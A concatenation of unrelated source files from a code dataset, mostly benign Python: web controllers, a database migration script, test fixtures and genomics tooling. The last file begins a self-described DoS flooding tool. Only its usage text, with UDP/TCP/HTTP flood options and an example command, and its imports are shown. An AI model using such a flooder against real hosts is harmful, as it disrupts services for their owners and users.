'bool_field': bool_field,
'int_field_default_none': int_field_default_none,
'tuple_int_field': tuple_int_field,
'list_str_field': list_str_field,
'dict_field': dict_field,
'dict_field_nesting': dict_field_nesting,
'list_dict_field': [dict_field, dict_field],
'list_dict_field_nesting': [dict_field_nesting, dict_field_nesting],
}
# vim:ts=4:sw=4
|
brianrodri/oppia | core/controllers/practice_sessions.py | Python | apache-2.0 | 3,351 | 0.000298 | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the practice sessions page."""
from __future__ import annotations
from core import feconf
from core.constants import constants
from core.controllers import acl_decorators
from core.controllers import base
from core.domain import skill_fetchers
from core.domain import topic_fetchers
class PracticeSessionsPage(base.BaseHandler):
"""Renders the practice sessions page."""
URL_PATH_ARGS_SCHEMAS = {
'classroom_url_fragment': constants.SCHEMA_FOR_CLASSROOM_URL_FRAGMENTS,
'topic_url_fragment': constants.SCHEMA_FOR_TOPIC_URL_FRAGMENTS
}
HANDLER_ARGS_SCHEMAS = {
'GET': {}
}
@acl_decorators.can_access_topic_viewer_page
def get(self, _):
"""Handles GET requests."""
self.render_template('practice-session-page.mainpage.html')
class PracticeSessionsPageDataHandler(base.BaseHandler):
"""Fetches relevant data for the practice sessions page."""
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_JSON
URL_PATH_ARGS_SCHEMAS = {
'classroom_url_fragment': constants.SCHEMA_FOR_CLASSROOM_URL_FRAGMENTS,
'topic_url_fragment': constants.SCHEMA_FOR_TOPIC_URL_FRAGMENTS
}
HANDLER_ARGS_SCHEMAS = {
'GET': {
'selected_subtopic_ids': {
'schema': {
'type': 'custom',
'obj_type': 'JsonEncodedInString'
}
}
}
}
@acl_decorators.can_access_topic_viewer_page
def get(self, topic_name):
        # Topic cannot be None here: the decorator above raises an exception
        # if the topic does not exist.
topic = topic_fetchers.get_topic_by_name(topic_name)
selected_subtopic_ids = (
self.normalized_request.get('selected_subtopic_ids'))
selected_skill_ids = []
for subtopic in topic.subtopics:
            # No error is raised here, since it's fine to ignore passed-in
            # subtopic IDs that don't exist, which can happen if the creator
            # deletes subtopics after the learner has loaded the topic viewer
            # page.
if subtopic.id in selected_subtopic_ids:
selected_skill_ids.extend(subtopic.skill_ids)
try:
skills = skill_fetchers.get_multi_skills(selected_skill_ids)
except Exception as e:
raise self.PageNotFoundException(e)
skill_ids_to_descriptions_map = {}
for skill in skills:
skill_ids_to_descriptions_map[skill.id] = skill.description
self.values.update({ | 'topic_name': topic.name,
'skill_ids_to_descriptions_map': skill_ids_to_descriptions_map
})
self.render_json(self.values)
| |
warner/magic-wormhole-transit-relay | misc/migrate_usage_db.py | Python | mit | 1,883 | 0 | """Migrate the usage data from the old bundled Transit Relay database.
The magic-wormhole package used to include both servers (Rendezvous and
Transit). "wormhole server" started both of these, and used the
"relay.sqlite" database to store both immediate server state and long-term
usage data.
These were split out to their own packages: version 0.11 omitted the Transit
Relay in favor of the new "magic-wormhole-transit-relay" distribution.
This script reads the long-term Transit usage data from the pre-0.11
wormhole-server relay.sqlite, and copies it into a new "u | sage.sqlite"
database in the current directory.
It will refuse to touch an existing "usage.sqlite" file.
The resuting "usage.sqlite" should be passed into --usage-db=, e.g. "twist
transitrelay --usage=.../PATH/TO/usage.sqlite".
"""
from __future__ import unicode_l | iterals, print_function
import sys
from wormhole_transit_relay.database import open_existing_db, create_db
source_fn = sys.argv[1]
source_db = open_existing_db(source_fn)
target_db = create_db("usage.sqlite")
num_rows = 0
for row in source_db.execute("SELECT * FROM `transit_usage`"
" ORDER BY `started`").fetchall():
target_db.execute("INSERT INTO `usage`"
" (`started`, `total_time`, `waiting_time`,"
" `total_bytes`, `result`)"
" VALUES(?,?,?,?,?)",
(row["started"], row["total_time"], row["waiting_time"],
row["total_bytes"], row["result"]))
num_rows += 1
target_db.execute("INSERT INTO `current`"
" (`rebooted`, `updated`, `connected`, `waiting`,"
" `incomplete_bytes`)"
" VALUES(?,?,?,?,?)",
(0, 0, 0, 0, 0))
target_db.commit()
print("usage database migrated (%d rows) into 'usage.sqlite'" % num_rows)
sys.exit(0)
|
maxime-beck/compassion-modules | partner_communication_revision/wizards/submit_revision_wizard.py | Python | agpl-3.0 | 2,059 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2018 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import models, api, fields
class ValidateRevisionWizard(models.TransientModel):
_name = 'partner.communication.submit.revision'
_description = 'Submit revision text wizard'
revision_id = fields.Many2one(
'partner.communication.revision',
default=lambda s: s._default_revision(),
)
state = fields.Selection(related='revision_id.state')
reviser_name = fields.Char(related='revision_id.user_id.name')
corrector_name = fields.Char(related='revision_id.correction_user_id.name')
comments = fields.Text()
@api.model
def _default_revision(self):
return self.env['partner.communication.revision'].browse(
s | elf._context['active_id'])
@api.multi
def submit | (self):
self.ensure_one()
revision = self.revision_id
if self.state == 'pending':
subject_base = u'[{}] Revision text submitted'
            body_base = u'A new text was submitted for approval. {}'
revision.write({
'proposition_correction':
revision.proposition_correction or revision.proposition_text,
'subject_correction':
revision.subject_correction or revision.subject,
'state': 'submit',
})
else:
subject_base = u'[{}] Correction submitted'
body_base = u'Corrections were proposed. {}'
revision.write({'state': 'corrected'})
body = body_base.format(self.comments or '').strip()
subject = subject_base.format(revision.display_name)
revision.notify_proposition(subject, body)
return True
|
elifesciences/elife-tools | tests/fixtures/test_refs/content_07_expected.py | Python | mit | 1,260 | 0.003175 | from collections import OrderedDict
expected = [
{
"uri_text": "http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"comment": "http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"data-title": "Mus musculus T-box 2 (Tbx2), mRNA",
"article_doi": "10.5334/cstp.77",
"authors": | [
{"surname": "Bollag", "given-names": "RJ", "group-type": "author"},
{"surname": "Siegfried", "given-names": "Z", "group-type": "author"},
{"surname": "Cebra-Thomas", "gi | ven-names": "J", "group-type": "author"},
{"surname": "Garvey", "given-names": "N", "group-type": "author"},
{"surname": "Davison", "given-names": "EM", "group-type": "author"},
{"surname": "Silver", "given-names": "LM", "group-type": "author"},
],
"accession": "NM_009324",
"uri": "http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"source": "NCBI Nucleotide",
"year": "1994b",
"position": 1,
"publication-type": "data",
"ref": "Bollag RJ Siegfried Z Cebra-Thomas J Garvey N Davison EM Silver LM 1994b Mus musculus T-box 2 (Tbx2), mRNA NCBI Nucleotide NM_009324 http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"id": "bib15",
}
]
|
bioinform/somaticseq | somaticseq/combine_callers.py | Python | bsd-2-clause | 22,749 | 0.018243 | #!/usr/bin/env python3
import os, re, subprocess
import somaticseq.vcfModifier.copy_TextFile as copy_TextFile
import somaticseq.vcfModifier.splitVcf as splitV | cf
import somaticseq.vcfModifier.getUniqueVcfPositions as getUniqueVcfPositions
from somaticseq.vcfModifier.vcfIntersector import *
# Combine individual VCF output into a simple combined VCF file, for single-sample callers
def comb | ineSingle(outdir, ref, bam, inclusion=None, exclusion=None,
mutect=None, mutect2=None, varscan=None, vardict=None, lofreq=None, scalpel=None, strelka=None,
arb_snvs=None, arb_indels=None, keep_intermediates=False):
if arb_snvs is None: arb_snvs = []
if arb_indels is None: arb_indels = []
hg_dict = re.sub(r'\.fa(sta)?$', '.dict', ref)
intermediate_files = set()
snv_intermediates = []
indel_intermediates = []
intermediate_vcfs = {'MuTect2' :{'snv': None, 'indel': None},
'VarScan2' :{'snv': None, 'indel': None},
'VarDict' :{'snv': None, 'indel': None},
'LoFreq' :{'snv': None, 'indel': None},
'Strelka' :{'snv': None, 'indel': None},
'Arbitrary' :{'snv': [], 'indel': []},
}
if mutect:
import somaticseq.vcfModifier.modify_MuTect as mod_mutect
mutect_in = bed_intersector(mutect, os.sep.join(( outdir, 'intersect.mutect1.vcf' )), inclusion, exclusion)
intermediate_files.add(mutect_in)
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect1.vcf' ))
mod_mutect.convert(mutect_in, snv_mutect_out, bam)
intermediate_files.add(snv_mutect_out)
snv_intermediates.append(snv_mutect_out)
if mutect2:
import somaticseq.vcfModifier.modify_ssMuTect2 as mod_mutect2
mutect2_in = bed_intersector(mutect2, os.sep.join(( outdir, 'intersect.mutect2.vcf' )), inclusion, exclusion)
intermediate_files.add(mutect2_in)
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect2.vcf' ))
indel_mutect_out = os.sep.join(( outdir, 'indel.mutect2.vcf' ))
mod_mutect2.convert(mutect2_in, snv_mutect_out, indel_mutect_out)
for file_i in snv_mutect_out, indel_mutect_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_mutect_out)
indel_intermediates.append(indel_mutect_out)
intermediate_vcfs['MuTect2']['snv'] = snv_mutect_out
intermediate_vcfs['MuTect2']['indel'] = indel_mutect_out
if varscan:
import somaticseq.vcfModifier.modify_VarScan2 as mod_varscan2
varscan_in = bed_intersector(varscan, os.sep.join(( outdir, 'intersect.varscan.vcf' )), inclusion, exclusion)
intermediate_files.add(varscan_in)
snv_temp = os.sep.join(( outdir, 'snv.varscan.temp.vcf' ))
indel_temp = os.sep.join(( outdir, 'indel.varscan.temp.vcf' ))
snv_varscan_out = os.sep.join(( outdir, 'snv.varscan.vcf' ))
indel_varscan_out = os.sep.join(( outdir, 'indel.varscan.vcf' ))
splitVcf.split_into_snv_and_indel(varscan_in, snv_temp, indel_temp)
mod_varscan2.convert(snv_temp, snv_varscan_out)
mod_varscan2.convert(indel_temp, indel_varscan_out)
for file_i in snv_temp, indel_temp, snv_varscan_out, indel_varscan_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_varscan_out)
indel_intermediates.append(indel_varscan_out)
intermediate_vcfs['VarScan2']['snv'] = snv_varscan_out
intermediate_vcfs['VarScan2']['indel'] = indel_varscan_out
if vardict:
import somaticseq.vcfModifier.modify_VarDict as mod_vardict
        # If the VarDict VCF file has lines that clash with bedtools
cleaned_vardict = os.sep.join(( outdir, 'cleaned.vardict.vcf' ))
cleaned_vardict = remove_vcf_illegal_lines(vardict, cleaned_vardict)
if cleaned_vardict:
intermediate_files.add( cleaned_vardict )
else:
cleaned_vardict = vardict
vardict_in = bed_intersector(cleaned_vardict, os.sep.join(( outdir, 'intersect.vardict.vcf' )), inclusion, exclusion)
intermediate_files.add(vardict_in)
snv_vardict_out = os.sep.join(( outdir, 'snv.vardict.vcf' ))
indel_vardict_out = os.sep.join(( outdir, 'indel.vardict.vcf'))
mod_vardict.convert(vardict_in, snv_vardict_out, indel_vardict_out)
sorted_snv_vardict_out = os.sep.join(( outdir, 'snv.sort.vardict.vcf'))
sorted_indel_vardict_out = os.sep.join(( outdir, 'indel.sort.vardict.vcf'))
vcfsorter(ref, snv_vardict_out, sorted_snv_vardict_out)
vcfsorter(ref, indel_vardict_out, sorted_indel_vardict_out)
for file_i in snv_vardict_out, indel_vardict_out, sorted_snv_vardict_out, sorted_indel_vardict_out:
intermediate_files.add( file_i )
snv_intermediates.append(sorted_snv_vardict_out)
indel_intermediates.append(sorted_indel_vardict_out)
intermediate_vcfs['VarDict']['snv'] = sorted_snv_vardict_out
intermediate_vcfs['VarDict']['indel'] = sorted_indel_vardict_out
if lofreq:
lofreq_in = bed_intersector(lofreq, os.sep.join(( outdir, 'intersect.lofreq.vcf' )), inclusion, exclusion)
intermediate_files.add(lofreq_in)
snv_lofreq_out = os.sep.join(( outdir, 'snv.lofreq.vcf' ))
indel_lofreq_out = os.sep.join(( outdir, 'indel.lofreq.vcf' ))
splitVcf.split_into_snv_and_indel(lofreq_in, snv_lofreq_out, indel_lofreq_out)
for file_i in snv_lofreq_out, indel_lofreq_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_lofreq_out)
indel_intermediates.append(indel_lofreq_out)
intermediate_vcfs['LoFreq']['snv'] = snv_lofreq_out
intermediate_vcfs['LoFreq']['indel'] = indel_lofreq_out
if scalpel:
scalpel_in = bed_intersector(scalpel, os.sep.join(( outdir, 'intersect.scalpel.vcf' )), inclusion, exclusion)
intermediate_files.add(scalpel_in)
scalpel_out = os.sep.join(( outdir, 'indel.scalpel.vcf' ))
copy_TextFile.copy(scalpel_in, scalpel_out)
intermediate_files.add(scalpel_out)
indel_intermediates.append(scalpel_out)
if strelka:
import somaticseq.vcfModifier.modify_ssStrelka as mod_strelka
strelka_in = bed_intersector(strelka, os.sep.join(( outdir, 'intersect.strelka.vcf' )), inclusion, exclusion)
intermediate_files.add(strelka_in)
snv_strelka_out = os.sep.join(( outdir, 'snv.strelka.vcf' ))
indel_strelka_out = os.sep.join(( outdir, 'indel.strelka.vcf' ))
mod_strelka.convert(strelka_in, snv_strelka_out, indel_strelka_out)
for file_i in snv_strelka_out, indel_strelka_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_strelka_out)
indel_intermediates.append(indel_strelka_out)
intermediate_vcfs['Strelka']['snv'] = snv_strelka_out
intermediate_vcfs['Strelka']['indel'] = indel_strelka_out
for ith_arb, arb_vcf_i in enumerate(arb_snvs):
arb_vcf_in = bed_intersector(arb_vcf_i, os.sep.join(( outdir, 'intersect.snv.arb_{}.vcf'.format(ith_arb) )), inclusion, exclusion)
intermediate_files.add(arb_vcf_in)
arb_vcf_out = os.sep.join(( outdir, 'snv.arb_{}.vcf'.format(ith_arb) ))
copy_TextFile.copy(arb_vcf_in, arb_vcf_out)
intermediate_files.add(arb_vcf_out)
snv_intermediates.append(arb_vcf_out)
intermediate_vcfs['Arbitrary']['snv'].append( arb_vcf_out )
for ith_arb, arb_vcf_i in enumerate(arb_indels):
arb_vcf_in = bed_intersector(arb_vcf_i, os.sep.join(( outdir, 'intersect.indel.arb_{}.vcf'.format(ith_arb) )), inclusion, exclusion)
intermediate_files |
mtreinish/stestr | stestr/tests/test_selection.py | Python | apache-2.0 | 7,058 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import io
import re
from unittest import mock
from stestr import selection
from stestr.tests import base
class TestSelection(base.TestCase):
def test_filter_tests_no_filter(s | elf):
test_list = ['a', 'b', 'c']
result = selection.filter_tests(None, test_list)
self.assertEqual(test_list, result)
def test_filter_tests(self):
test_list = ['a', 'b', 'c']
result = selection.filter_tests(['a'], test_list)
self.assertEqual(['a'], result)
def test_filter_invalid_regex(self):
test_list = ['a', 'b', 'c']
with mock.patch('sys.exit', side_effect=ImportError) as mock_exit:
self.assertRaises(ImportError, sele | ction.filter_tests,
['fake_regex_with_bad_part[The-BAD-part]'],
test_list)
mock_exit.assert_called_once_with(5)
class TestExclusionReader(base.TestCase):
def test_exclusion_reader(self):
exclude_list = io.StringIO()
for i in range(4):
exclude_list.write('fake_regex_%s\n' % i)
exclude_list.write('fake_regex_with_note_%s # note\n' % i)
exclude_list.seek(0)
with mock.patch('builtins.open',
return_value=exclude_list):
result = selection.exclusion_reader('fake_path')
self.assertEqual(2 * 4, len(result))
note_cnt = 0
# not assuming ordering, mainly just testing the type
for r in result:
self.assertEqual(r[2], [])
if r[1] == 'note':
note_cnt += 1
self.assertIn('search', dir(r[0])) # like a compiled regexp
self.assertEqual(note_cnt, 4)
def test_invalid_regex(self):
exclude_list = io.StringIO()
exclude_list.write("fake_regex_with_bad_part[The-BAD-part]")
exclude_list.seek(0)
with mock.patch('builtins.open',
return_value=exclude_list):
with mock.patch('sys.exit') as mock_exit:
selection.exclusion_reader('fake_path')
mock_exit.assert_called_once_with(5)
class TestConstructList(base.TestCase):
def test_simple_re(self):
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
result = selection.construct_list(test_lists, regexes=['foo'])
self.assertEqual(list(result), ['fake_test(scen)[egg,foo])'])
def test_simple_exclusion_re(self):
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
result = selection.construct_list(test_lists, exclude_regex='foo')
self.assertEqual(list(result), ['fake_test(scen)[tag,bar])'])
def test_invalid_exclusion_re(self):
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
invalid_regex = "fake_regex_with_bad_part[The-BAD-part]"
with mock.patch('sys.exit', side_effect=ImportError) as exit_mock:
self.assertRaises(ImportError, selection.construct_list,
test_lists, exclude_regex=invalid_regex)
exit_mock.assert_called_once_with(5)
def test_exclusion_list(self):
exclude_list = [(re.compile('foo'), 'foo not liked', [])]
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
with mock.patch('stestr.selection.exclusion_reader',
return_value=exclude_list):
result = selection.construct_list(test_lists,
exclude_list='file',
regexes=['fake_test'])
self.assertEqual(list(result), ['fake_test(scen)[tag,bar])'])
def test_inclusion_list(self):
include_list = [re.compile('fake_test1'), re.compile('fake_test2')]
test_lists = ['fake_test1[tg]', 'fake_test2[tg]', 'fake_test3[tg]']
include_getter = 'stestr.selection._get_regex_from_include_list'
with mock.patch(include_getter,
return_value=include_list):
result = selection.construct_list(test_lists,
include_list='file')
self.assertEqual(set(result),
{'fake_test1[tg]', 'fake_test2[tg]'})
def test_inclusion_list_invalid_regex(self):
include_list = io.StringIO()
include_list.write("fake_regex_with_bad_part[The-BAD-part]")
include_list.seek(0)
with mock.patch('builtins.open',
return_value=include_list):
with mock.patch('sys.exit') as mock_exit:
selection._get_regex_from_include_list('fake_path')
mock_exit.assert_called_once_with(5)
def test_inclusion_exclusion_list_re(self):
include_list = [re.compile('fake_test1'), re.compile('fake_test2')]
test_lists = ['fake_test1[tg]', 'fake_test2[spam]',
'fake_test3[tg,foo]', 'fake_test4[spam]']
exclude_list = [(re.compile('spam'), 'spam not liked', [])]
include_getter = 'stestr.selection._get_regex_from_include_list'
with mock.patch(include_getter,
return_value=include_list):
with mock.patch('stestr.selection.exclusion_reader',
return_value=exclude_list):
result = selection.construct_list(
test_lists, exclude_list='exclude_file',
include_list='include_file', regexes=['foo'])
self.assertEqual(set(result),
{'fake_test1[tg]', 'fake_test3[tg,foo]'})
def test_overlapping_exclude_regex(self):
exclude_list = [(re.compile('compute.test_keypairs.KeypairsTestV210'),
'', []),
(re.compile('compute.test_keypairs.KeypairsTestV21'),
'', [])]
test_lists = [
'compute.test_keypairs.KeypairsTestV210.test_create_keypair',
'compute.test_keypairs.KeypairsTestV21.test_create_keypair',
'compute.test_fake.FakeTest.test_fake_test']
with mock.patch('stestr.selection.exclusion_reader',
return_value=exclude_list):
result = selection.construct_list(test_lists,
exclude_list='file',
regexes=['fake_test'])
self.assertEqual(
list(result), ['compute.test_fake.FakeTest.test_fake_test'])
|
ml31415/numpy-groupies | numpy_groupies/tests/__init__.py | Python | bsd-2-clause | 2,023 | 0.00346 | import pytest
from .. import aggregate_purepy, aggregate_numpy_ufunc, aggregate_numpy
try:
from .. import aggregate_numba
except ImportError:
aggregate_numba = None
try:
from .. import aggregate_weave
except ImportError:
aggregate_weave = None
try:
from .. import aggregate_pandas
except ImportError:
aggregate_pandas = None
_implementations = [aggregate_purepy, aggregate_numpy_ufunc, aggregate_numpy,
aggregate_numba, aggregate_weave, aggregate_pandas]
_implementations = [i for i in _implementations if i is not None]
def _impl_name(impl):
if not impl:
return
return impl.__name__.rsplit('aggregate_', 1)[1].rsplit('_', 1)[-1]
_not_implemented_by_impl_name = {
'numpy': ['cumprod','cummax', 'cummin'],
'purepy': ['cumprod','cummax', 'cummin'],
'numba': ('array', 'list'),
'pandas': ('array', 'list'),
'weave': ('argmin', 'argmax', 'array', 'list', 'cumsum',
'<lambda>', 'func_preserve_order', 'func_arbitrary')}
def _wrap_notimplemented_xfail(impl, name=None):
"""Some implementations lack some functionality. That's ok, let's xfail that instead of raising errors."""
def _try_xfail(*args, **kwargs):
try:
return impl(*args, **kwargs)
except NotImplementedError as e:
func = kwargs.pop('func', None)
if callable(func):
func = func.__name__
wrap_funcs = _not_implemented_b | y_impl_name.get | (func, None)
if wrap_funcs is None or func in wrap_funcs:
pytest.xfail("Functionality not implemented")
else:
raise e
if name:
_try_xfail.__name__ = name
else:
_try_xfail.__name__ = impl.__name__
return _try_xfail
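# A hypothetical usage sketch of the wrapper above (variable names are
# illustrative, and it assumes each backend module exposes an `aggregate`
# callable):
#   safe_aggregates = [
#       _wrap_notimplemented_xfail(impl.aggregate, 'aggregate_' + _impl_name(impl))
#       for impl in _implementations]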
func_list = ('sum', 'prod', 'min', 'max', 'all', 'any', 'mean', 'std', 'var', 'len',
'argmin', 'argmax', 'anynan', 'allnan', 'cumsum',
'nansum', 'nanprod', 'nanmin', 'nanmax', 'nanmean', 'nanstd', 'nanvar','nanlen')
|
ceibal-tatu/sugar-toolkit | tests/graphics/toolbarpalettes.py | Python | lgpl-2.1 | 1,649 | 0 | # Copyright (C) 2007, Red Hat, Inc.
# |
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the | Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""
Test palette positioning for toolbar and tray.
"""
import gtk
from sugar.graphics.tray import HTray, TrayButton
from sugar.graphics.toolbutton import ToolButton
import common
test = common.Test()
vbox = gtk.VBox()
theme_icons = gtk.icon_theme_get_default().list_icons()
toolbar = gtk.Toolbar()
vbox.pack_start(toolbar, False)
toolbar.show()
for i in range(0, 5):
button = ToolButton(icon_name=theme_icons[i])
button.set_tooltip('Icon %d' % i)
toolbar.insert(button, -1)
button.show()
content = gtk.Label()
vbox.pack_start(content)
content.show()
tray = HTray()
vbox.pack_start(tray, False)
tray.show()
for i in range(0, 30):
button = TrayButton(icon_name=theme_icons[i])
button.set_tooltip('Icon %d' % i)
tray.add_item(button)
button.show()
test.pack_start(vbox)
vbox.show()
test.show()
if __name__ == '__main__':
common.main(test)
|
deerwalk/voltdb | lib/python/voltcli/checkstats.py | Python | agpl-3.0 | 18,888 | 0.006777 | # This file is part of VoltDB.
# Copyright (C) 2008-2017 VoltDB Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
import sys
import time
import voltdbclient
def check_exporter(runner):
runner.info('Completing outstanding exporter transactions...')
last_table_stat_time = 0
export_tables_with_data = dict()
last_table_stat_time = check_export_stats(runner, export_tables_with_data, last_table_stat_time)
if last_table_stat_time == 1:
# there are no outstanding export transactions
runner.info('All exporter transactions have been processed.')
return
# after 10 seconds notify admin of what transactions have not drained
notifyInterval = 10
# have to get two samples of table stats because the cached value could be from before Quiesce
last_export_tables_with_data = dict()
lastUpdatedTime = time.time()
while True:
time.sleep(1)
if last_table_stat_time > 1:
curr_table_stat_time = check_export_stats(runner, export_tables_with_data, last_table_stat_time)
if last_table_stat_time == 1 or curr_table_stat_time > last_table_stat_time:
# have a new sample from table stat cache or there are no tables
if not export_tables_with_data:
runner.info('All exporter transactions have been processed.')
return
notifyInterval -= 1
if notifyInterval == 0:
| notifyInterva | l = 10
if last_table_stat_time > 1 and export_tables_with_data:
print_export_pending(runner, export_tables_with_data)
lastUpdatedTime = monitorStatisticsProgress(last_export_tables_with_data, export_tables_with_data, lastUpdatedTime, runner, 'Exporter')
last_export_tables_with_data = export_tables_with_data.copy()
def check_dr_producer(runner):
runner.info('Completing outstanding DR producer transactions...')
partition_min_host = dict()
partition_min = dict()
partition_max = dict()
partition_gap_min = dict()
last_partition_min = dict()
last_partition_max = dict()
lastUpdatedTime = time.time()
dr_producer_stats(runner, partition_min_host, partition_min, partition_max, partition_gap_min)
if not partition_min:
# there are no outstanding export or dr transactions
runner.info('All DR producer transactions have been processed.')
return
# after 10 seconds notify admin of what transactions have not drained
notifyInterval = 10
# have to get two samples of table stats because the cached value could be from before Quiesce
while True:
time.sleep(1)
if partition_min:
dr_producer_stats(runner, partition_min_host, partition_min, partition_max, partition_gap_min)
if not partition_min:
runner.info('All DR producer transactions have been processed.')
return
notifyInterval -= 1
if notifyInterval == 0:
notifyInterval = 10
if partition_min:
print_dr_pending(runner, partition_min_host, partition_min, partition_max, partition_gap_min)
lastUpdatedTime = monitorDRProducerStatisticsProgress(last_partition_min, last_partition_max, partition_min, partition_max, lastUpdatedTime, runner)
last_partition_min = partition_min.copy()
last_partition_max = partition_max.copy()
def monitorDRProducerStatisticsProgress(lastPartitionMin, lastPartitionMax, currentPartitionMin,
currentPartitionMax, lastUpdatedTime, runner):
currentTime = time.time()
timeout = runner.opts.timeout
#any stats progress?
partitionMinProgressed = cmp(lastPartitionMin, currentPartitionMin)
partitionMaxprogressed = cmp(lastPartitionMax, currentPartitionMax)
#stats moved
    if partitionMinProgressed != 0 or partitionMaxprogressed != 0:
return currentTime
timeSinceLastUpdate = currentTime - lastUpdatedTime
#stats timeout
if timeSinceLastUpdate > timeout:
msg = "The cluster has not drained any transactions for DRPRODUCER in last %d seconds. There are outstanding transactions."
raise StatisticsProcedureException( msg % (timeout), 1)
#stats has not been moved but not timeout yet
return lastUpdatedTime
def get_stats(runner, component):
retry = 5
while retry > 0:
retry -= 1
resp = runner.call_proc('@Statistics', [voltdbclient.FastSerializer.VOLTTYPE_STRING,
voltdbclient.FastSerializer.VOLTTYPE_INTEGER], [component, 0], False)
status = resp.status()
if status == 1:
return resp
#procedure timeout, retry
if status == -6:
time.sleep(1)
else:
raise StatisticsProcedureException("Unexpected errors to collect statistics for %s: %s." % (component, resp.response.statusString), 1, False)
if retry == 0:
raise StatisticsProcedureException("Unable to collect statistics for %s after 5 attempts." % component, 1, False)
def dr_producer_stats(runner, partition_min_host, partition_min, partition_max, partition_gap_min):
resp = get_stats(runner, 'DRPRODUCER')
partition_data = resp.table(0)
for pid in partition_min:
# reset all min values to find the new min
if pid in partition_max:
partition_min[pid] = partition_max[pid]
if len(partition_data.tuples()) == 0:
return
for row in partition_data.tuples():
pid = row[5]
hostname = str(row[2])
if str(row[10]) == 'None':
last_queued = -1
else:
last_queued = row[10]
if str(row[11]) == 'None':
last_acked = -1
else:
last_acked = row[11]
if str(row[16]) == 'None':
queue_gap = 0
else:
queue_gap = row[16]
# Initial state, no transactions are queued and acknowledged.
if last_queued == -1 and last_acked == -1:
continue
# check TOTALBYTES
if row[7] > 0 or queue_gap != 0:
# track the highest seen drId for each partition. use last queued to get the upper bound
if pid in partition_max:
partition_max[pid] = max(last_queued, partition_max[pid])
else:
partition_max[pid] = last_queued
if pid in partition_gap_min:
# if queue_gap == 0 and last_acked == -1 do nothing because without a real ack the gap value is meaningless
if queue_gap != 0 or last_acked != -1:
partition_gap_min[pid] = min(queue_gap, partition_gap_min[pid])
else:
partition_gap_min[pid] = queue_gap
if pid in partition_min:
if last_acked < partition_min[pid]:
# this replica is farther behind
partition_min[pid] = last_acked
else:
partition_min_host[pid] = set()
partition_min[pid] = last_acked
partition_min_host[pid].add(hostname)
else:
# this hostname's partition has an empty InvocationBufferQueue
if pid in partition_min:
# it was not empty on a previous call
partition_min_host[pid].discard(hostname)
if not partition_min_host[pid]:
del partition_min_host[pid]
del partition_min[pid]
# set last queu |
BlackVikingPro/D.A.B. | dab.py | Python | gpl-3.0 | 14,157 | 0.043205 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
""" Python DAB ~ DoS Tool ~ By Wįłłý Fœx : @BlackVikingPro """
""" Current Version: v2.0 """
"""
Python D.A.B. [ |)3|\|`/ 411 |31T(|-|3z ] ~ DoS Tool ~ By Wįłłý Fœx : @BlackVikingPro
Use at your own risk. I do/will not condone any illegal activity
I'm not responsible for your actions.
Usage and Syntax:
Syntax: ./dab.py -s <target> -p <port> -t <type>
Usage | Options:
-s [--server] - Target server's ip/hostname
-p [--port] - Port to flood with packets
-t [--type] - Type of attack [udp, tcp, http]
-- if 'http' was chosen, define either: '--get' or '--post' for the request method.
-m [--message] - Custom tcp/udp/http message to send
        --port-threading - Enable port threading [ --port doesn't need to be defined if this is set ]
Example: ./dab.py --server loop.blackvikingpro.xyz --port 80 --type tcp --message getrekt
"""
import os, sys, socket, time, requests, signal, platform, requests, threading
from multiprocessing import Process
version = 'v2.0 [stable]'
verbose = False # display verbose-level information
def usage():
print ("")
print ( " Python D.A.B. \033[93m[ |)3|\|`/ 411 |31T(|-|3z ]\033[0m ~ DoS Tool ~ By " + str("Wįłłý Fœx") + " : @BlackVikingPro" )
